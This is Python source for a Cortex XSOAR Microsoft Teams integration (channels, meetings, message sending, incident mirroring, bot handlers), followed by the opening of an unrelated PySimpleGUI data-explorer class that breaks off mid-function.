# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def create_meeting(user_id: str, subject: str, start_date_time: str, end_date_time: str) -> dict:
"""
Creates a Microsoft Teams meeting
:param user_id: The User's ID
:param subject: The meeting's subject
:param start_date_time: The meeting's start time
:param end_date_time: The meeting's end time
:return: Dict with info about the created meeting.
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users/{user_id}/onlineMeetings'
request_json: dict = {
'subject': subject
}
if start_date_time:
request_json['startDateTime'] = start_date_time
if end_date_time:
request_json['endDateTime'] = end_date_time
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
return channel_data
def create_channel_command():
channel_name: str = demisto.args().get('channel_name', '')
channel_description: str = demisto.args().get('description', '')
team_name: str = demisto.args().get('team', '')
team_aad_id = get_team_aad_id(team_name)
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
if channel_id:
demisto.results(f'The channel "{channel_name}" was created successfully')
def create_meeting_command():
subject: str = demisto.args().get('subject', '')
start_date_time: str = demisto.args().get('start_time', '')
end_date_time: str = demisto.args().get('end_time', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
meeting_data: dict = create_meeting(user[0].get('id'), subject, start_date_time, end_date_time)
thread_id = ''
message_id = ''
if chat_info := meeting_data.get('chatInfo', {}):
thread_id = chat_info.get('threadId', '')
message_id = chat_info.get('messageId', '')
participant_id, participant_display_name = get_participant_info(meeting_data.get('participants', {}))
outputs = {
'creationDateTime': meeting_data.get('creationDateTime', ''),
'threadId': thread_id,
'messageId': message_id,
'id': meeting_data.get('id', ''),
'joinWebUrl': meeting_data.get('joinWebUrl', ''),
'participantId': participant_id,
'participantDisplayName': participant_display_name
}
result = CommandResults(
readable_output=f'The meeting "{subject}" was created successfully',
outputs_prefix='MicrosoftTeams.CreateMeeting',
outputs_key_field='id',
outputs=outputs
)
return_results(result)
def get_participant_info(participants: dict) -> Tuple[str, str]:
"""
Retrieves the participant ID and name
:param participants: The participants in the Team meeting
:return: The participant ID and name
"""
participant_id = ''
participant_display_name = ''
if participants:
user = participants.get('organizer', {}).get('identity', {}).get('user', {})
if user:
participant_id = user.get('id')
participant_display_name = user.get('displayName')
return participant_id, participant_display_name
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
:param team_id: ID of team to get team members of
:param service_url: Bot service URL to query
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = get_integration_context()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
    :param service_url: Bot service URL to query
    :param channel_id: ID of channel to send message in
    :param conversation: Conversation message object to send
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
"""
Processes the message to include all mentioned users in the right format. For example:
Input: 'good morning @Demisto'
Output (Formatted message): 'good morning <at>@Demisto</at>'
:param message: The message to be processed
:return: A list of the mentioned users, The processed message
"""
mentioned_users: list = [''.join(user) for user in re.findall(MENTION_REGEX, message)]
for user in mentioned_users:
message = message.replace(f'@{user};', f'<at>@{user}</at>')
return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
"""
Returns a list of entities built from the mentioned users
:param mentioned_users: A list of mentioned users in the message
:param integration_context: Cached object to retrieve relevant data from
:return: A list of entities
"""
return [{'type': 'mention', 'mentioned': {'id': get_team_member_id(user, integration_context), 'name': user},
'text': f'<at>@{user}</at>'} for user in mentioned_users]
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if (not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}) \
or channel_name == INCIDENT_NOTIFICATIONS_CHANNEL:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '') or demisto.args().get('to', '')
if not (team_member or channel_name):
        raise ValueError('No channel or team member to send the message to was provided.')
if team_member and channel_name:
raise ValueError('Provide either channel or team member to send message to, not both.')
if not (message or adaptive_card):
        raise ValueError('No message or adaptive card to send was provided.')
if message and adaptive_card:
        raise ValueError('Provide either message or adaptive card to send, not both.')
integration_context: dict = get_integration_context()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
entities = mentioned_users_to_entities(mentioned_users, integration_context)
demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
conversation = {
'type': 'message',
'text': formatted_message_with_mentions,
'entities': entities
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
demisto.results('Message was sent successfully.')
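# Usage sketch (assumed invocations; the command name comes from the command mapping in
# main() and the argument names from the demisto.args() reads above - channel/incident
# values are hypothetical):
#   !send-notification channel="incident-123" message="please review @Demisto;"
#   !send-notification team_member="user@example.com" message="direct message to a user"
# Mentions written as "@<user>;" are rewritten to "<at>@<user></at>" and resolved into
# entities via process_mentioned_users_in_message and mentioned_users_to_entities.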
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
        raise ValueError('Cannot perform this action in the playground.')
integration_context: dict = get_integration_context()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
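# Usage sketch (assumed invocation; argument names match the demisto.args() reads above,
# the values are hypothetical):
#   !mirror-investigation mirror_type="all" direction="both" autoclose="true" channel_name="incident-42"
# When channel_name is omitted, the channel name defaults to 'incident-<investigation id>'.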
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
integration_context = get_integration_context()
try:
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except json.decoder.JSONDecodeError as json_decode_error:
demisto.error(
f'An error occurred in channel mirror loop while trying to deserialize teams from cache: '
f'{str(json_decode_error)}'
)
demisto.debug(f'Cache object: {integration_context}')
demisto.updateModuleHealth(f'An error occurred: {str(json_decode_error)}')
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
        # Didn't find an existing team, adding a new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
    :param value: Object which includes the user's response together with the entitlement GUID, investigation ID and task ID
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
demisto.debug('Processing POST query...')
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = get_integration_context()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
set_integration_context(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
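# Rough shape of the Bot Framework activity this endpoint routes on (a sketch, not the
# full schema - only the fields read above are shown, values are placeholders):
#   {
#     "serviceUrl": "https://smba.trafficmanager.net/...",
#     "channelData": {"eventType": "teamMemberAdded", "team": {...}, "tenant": {...}},
#     "conversation": {"conversationType": "personal", "id": "..."},
#     "from": {"id": "...", "name": "..."},
#     "text": "<at>Bot</at> some message",
#     "value": {...}
#   }
# "value" is only present for TeamsAsk responses; "eventType" only for membership events.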
def ring_user_request(call_request_data):
return http_request(method='POST', url=f'{GRAPH_BASE_URL}/v1.0/communications/calls',
json_=call_request_data)
def ring_user():
"""Rings a user on Teams.
Notes:
        This is a ring only; no media is played if the generated call is answered.
Returns:
None.
"""
bot_id = demisto.params().get('bot_id')
integration_context: dict = get_integration_context()
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
# get user to call name and id
username_to_call = demisto.args().get('username')
user: list = get_user(username_to_call)
if not (user and user[0].get('id')):
raise ValueError(f'User {username_to_call} was not found')
call_request_data = {
"@odata.type": "#microsoft.graph.call",
"callbackUri": 'https://callback.url',
"direction": "outgoing",
"source": {
"@odata.type": "#microsoft.graph.participantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"application": {
"@odata.type": "#microsoft.graph.identity",
"id": bot_id
}
}
},
"targets": [
{
"@odata.type": "#microsoft.graph.invitationParticipantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"user": {
"@odata.type": "#microsoft.graph.identity",
"displayName": username_to_call,
"id": user[0].get('id')
}
}
}
],
"requestedModalities": [
"audio"
],
"mediaConfig": {
"@odata.type": "#microsoft.graph.serviceHostedMediaConfig",
},
"tenantId": tenant_id
}
response = ring_user_request(call_request_data)
return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
while True:
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
server = None
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('0.0.0.0', port), APP, **ssl_args)
demisto.updateModuleHealth('')
server.serve_forever()
except Exception as e:
error_message = str(e)
demisto.error(f'An error occurred in long running loop: {error_message} - {format_exc()}')
demisto.updateModuleHealth(f'An error occurred: {error_message}')
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
if server:
server.stop()
time.sleep(5)
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health,
'create-channel': create_channel_command,
'add-user-to-channel': add_user_to_channel_command,
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
'microsoft-teams-ring-user': ring_user,
'microsoft-teams-create-channel': create_channel_command,
'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
'microsoft-teams-create-meeting': create_meeting_command,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
return_error(f'{str(e)} - {format_exc()}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
des_layout.py
|
import sys
sys.dont_write_bytecode = True
import PySimpleGUI as sg
import matplotlib
matplotlib.use('TkAgg')
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import pandas as pd
import matplotlib.pyplot as plt
import os
import shutil
import glob
import controller.des.exit_button as exit_button
import controller.des.new_button as new_button
import controller.des.chat_button as chat_button
import threading
from threading import Thread
import time
import signal
class des_layout(object):
'''
A class representing a data explorer screen.
Attributes:
window: the window the des gui layout is applied to.
user_manager: an object representing the current user's statuses.
layout: the list of elements comprising the des gui.
components: the elements that comprise the des gui.
controls: the event-triggered controllers linked to the des gui.
figure_agg: the current matplotlib figure.
data_frame: the current pandas dataframe.
data_path: the path of the data source folder.
'''
def __init__(self, user_manager):
'''
The constructor for des_layout.
'''
self.window = None
self.user_manager = user_manager
self.jsnDrop = user_manager.jsnDrop
self.layout = []
self.components = {'components': False}
self.controls = []
self.figure_agg = None
self.data_frame = pd.DataFrame()
        self.data_path = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data_source")
self.chat_count = 0
self.exit_event = threading.Event()
signal.signal(signal.SIGINT, self.signal_handler)
def self_layout(self, **kwargs):
'''
The function to instantiate the elements & layout for des_layout.
'''
sg.theme('Dark Blue 3')
self.components['chatbox'] = sg.Multiline('Chatbox', autoscroll=False, disabled=True, key='chatbox', size=(50,10))
self.components['message'] = sg.Input('', key='message')
self.components['figure_select'] = sg.Button(button_text = 'Select CSV File')
self.components['figure_upload'] = sg.Button(button_text = 'Upload CSV File')
self.components['new_button'] = sg.Button(button_text = 'New DES')
self.controls += [new_button.new]
self.components['chat_button'] = sg.Button(button_text = 'Send')
self.controls += [chat_button.chat]
self.controls += [exit_button.exit]
self.layout = [
[self.components['figure_select'],self.components['figure_upload']],
[sg.Canvas(key='-CANVAS-', size=(450,450))],
[self.components['chatbox']],
[self.components['message'],self.components['chat_button']],
[self.components['new_button']]
]
def draw_figure(self, canvas, figure):
'''
The function to draw the current selected figure for des_layout.
'''
figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)
figure_canvas_agg.draw()
figure_canvas_agg.get_tk_widget().pack(side='top', fill='both', expand=1)
return figure_canvas_agg
def delete_figure_agg(self):
'''
The function to delete the current figure for des_layout.
'''
if self.figure_agg:
self.figure_agg.get_tk_widget().forget()
plt.close('all')
def signal_handler(self, signum, frame):
'''
The function to set the handler for asynchronous events.
'''
self.exit_event.set()
def set_up_chat_thread(self):
'''
        The function to instantiate the chat thread.
'''
self.user_manager.chat_thread = Thread(target=self.chat_display_update,args=([self.user_manager]))
        self.user_manager.chat_thread.daemon = True
self.user_manager.stop_thread = False
self.user_manager.chat_thread.start()
def chat_display_update(self, user_manager):
'''
The function to update the chat display for the current des.
'''
time.sleep(2)
if self.window != None:
self.chat_count += 1
result = self.jsnDrop.select("tblChat",f"DESID = '{user_manager.current_screen}'")
if result != "Data error. Nothing selected from tblChat":
messages = ""
sorted_chats = sorted(result,key = lambda i : i['Time'] )
for record in sorted_chats:
new_display = ""
if not (user_manager.latest_time is None):
if record['Time'] > user_manager.latest_time:
